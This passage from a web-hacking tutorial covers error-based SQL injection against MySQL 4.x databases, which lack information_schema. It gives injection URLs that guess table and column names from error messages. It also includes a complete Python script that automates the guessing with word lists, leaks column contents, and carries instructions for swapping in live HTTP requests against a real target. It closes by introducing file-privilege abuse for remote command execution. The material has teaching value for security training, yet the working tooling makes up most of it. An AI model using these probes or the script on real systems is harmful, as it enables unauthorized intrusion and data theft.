MySQL Versions Below 5
Most of the time you will be up against MySQL 5 or later. When the target runs an older release (4.x or earlier), some extra work is needed and the chance of success is lower than against MySQL 5, because those versions have no information_schema database (it was introduced in MySQL 5.0). Without it, the table names and the columns of each table have to be guessed, and we rely on the server's error messages to tell whether a guessed table or column actually exists.
Guessing Table Names
Let's assume that, in the earlier scenario, we are up against a MySQL 4 database and already know the database name; we now need to guess the table names. The syntax for this would be as follows:
Syntax
http://target.com/index.php?support=yes' and 1=0 union select 1,2,3,4,5 from dvwa.admins--+
(Table doesn’t exist or any other error)
Ethical Hacking and Penetration Testing Guide
An error was generated, indicating that the admins table does not exist. If the table existed, there would have been no error message. Note that the five placeholder values must match the column count of the original query (established earlier when the injection was first confirmed); with the wrong count MySQL reports a column-count mismatch for existing and non-existing tables alike, and the probe tells you nothing.
Guessing Columns
In a similar manner we can guess column names and, based on the errors generated, conclude whether a guessed column is valid.
Syntax
http://target.com/index.php?support=yes' and 1=0 union select 1,2,user,4,5 from dvwa.users--+
(Unknown column or any other error)
If we have determined the correct column name, all the data inside the column would be
displayed to us.
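The two guessing steps above are tedious by hand, so here is an added example (not the book's code) that automates them: it builds the union probes, classifies the response by the MySQL error text, and walks a word list first for tables and then for columns. The target URL, the support parameter, the word lists and the simulated dvwa schema are assumptions made up for the demo; the fake_target function stands in for the vulnerable page so the script runs offline.

```python
"""Error-based table and column guessing against a MySQL server that has no
information_schema (4.x and earlier).  Added example, not the book's code:
the target URL, the parameter name, the word lists and the simulated schema
are all assumptions made up for the demo."""
import re
from urllib.parse import parse_qs, quote, urlparse

# Message shapes MySQL itself emits for these failures (errors 1146 and 1054).
TABLE_MISSING = re.compile(r"Table '[^']+' doesn't exist")
COLUMN_MISSING = re.compile(r"Unknown column '[^']+'")


def build_probe(base_url, param, value, select_list, table):
    """Build the URL for:  value' and 1=0 union select <select_list> from <table>--+

    1=0 empties the original result so only the injected row is rendered;
    '--+' decodes to '-- ' (MySQL needs a space after the comment marker).
    """
    payload = f"{value}' and 1=0 union select {select_list} from {table}--+"
    encoded = quote(payload, safe="',=+")
    return f"{base_url}?{param}={encoded}"


def classify(body):
    """Map a response body to the outcome its error message reveals."""
    if TABLE_MISSING.search(body):
        return "no-table"
    if COLUMN_MISSING.search(body):
        return "no-column"
    return "ok"  # no recognised error: the guessed name exists


def guess_tables(send, base_url, param, value, db, ncols, wordlist):
    """Return the words in wordlist that exist as tables in db.

    ncols must equal the column count of the original query; otherwise
    MySQL reports a column-count mismatch for every guess."""
    placeholders = ",".join(str(i) for i in range(1, ncols + 1))
    found = []
    for table in wordlist:
        body = send(build_probe(base_url, param, value, placeholders, f"{db}.{table}"))
        if classify(body) == "ok":
            found.append(table)
    return found


def guess_columns(send, base_url, param, value, db, table, ncols, visible_pos, wordlist):
    """Return the words in wordlist that exist as columns of db.table.

    visible_pos is the 1-based placeholder the page actually renders, so a
    hit also leaks that column's contents."""
    found = []
    for col in wordlist:
        cells = [str(i) for i in range(1, ncols + 1)]
        cells[visible_pos - 1] = col
        body = send(build_probe(base_url, param, value, ",".join(cells), f"{db}.{table}"))
        if classify(body) == "ok":
            found.append(col)
    return found


# --- Constructed stand-in for the vulnerable page (no network needed) --------
# The attacker does not know this schema; it is what the probes discover.
FAKE_SCHEMA = {"dvwa": {"users": ["user_id", "user", "password"],
                        "guestbook": ["comment_id", "comment", "name"]}}
INJECTED = re.compile(r"union select (.+?) from (\w+)\.(\w+)--", re.I)


def fake_target(url, param="support"):
    """Render what a MySQL-4-backed index.php would return for this URL."""
    value = parse_qs(urlparse(url).query)[param][0]  # decoded, '+' -> ' '
    m = INJECTED.search(value)
    if not m:
        return "<html>support page</html>"
    select_list, db, table = m.groups()
    cols = FAKE_SCHEMA.get(db, {}).get(table)
    if cols is None:
        return f"Table '{db}.{table}' doesn't exist"
    for item in (s.strip() for s in select_list.split(",")):
        if not item.isdigit() and item not in cols:
            return f"Unknown column '{item}' in 'field list'"
    return "<html>" + select_list + "</html>"  # the union row, rendered


if __name__ == "__main__":
    base, param, value = "http://target.com/index.php", "support", "yes"
    tables = guess_tables(fake_target, base, param, value, "dvwa", 5,
                          ["admins", "users", "members", "guestbook"])
    print("tables:", tables)
    cols = guess_columns(fake_target, base, param, value, "dvwa", "users", 5, 3,
                         ["username", "user", "password", "email"])
    print("columns of dvwa.users:", cols)
```

To run this against a real target, replace fake_target with a function that performs the HTTP GET and returns the body (for example `requests.get(url).text`). If the application suppresses database errors, match on a diff against a baseline response instead of the message text; and keep in mind this sends one request per word, so it is noisy in the target's logs.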
SQL Injection to Remote Command Execution
SQL injection vulnerabilities can also be used to execute commands on the target operating system. Whether this works depends on the operating system and on the privileges of the database user the application connects as. In our case we have root-level privileges on the MySQL server, so we can run any SQL statement, including SELECT, INSERT, UPDATE, and DELETE. What we are really after, however, is the FILE privilege, which allows us to read files from, and write files to, the filesystem of the host running MySQL (the web server itself when the database and the web application share a machine). Two caveats apply: the MySQL server process must itself have permission on the path in question, and on later MySQL releases the secure_file_priv setting can restrict or disable file access entirely. Let's see the syntax for enumerating user privileges:
Web Hacking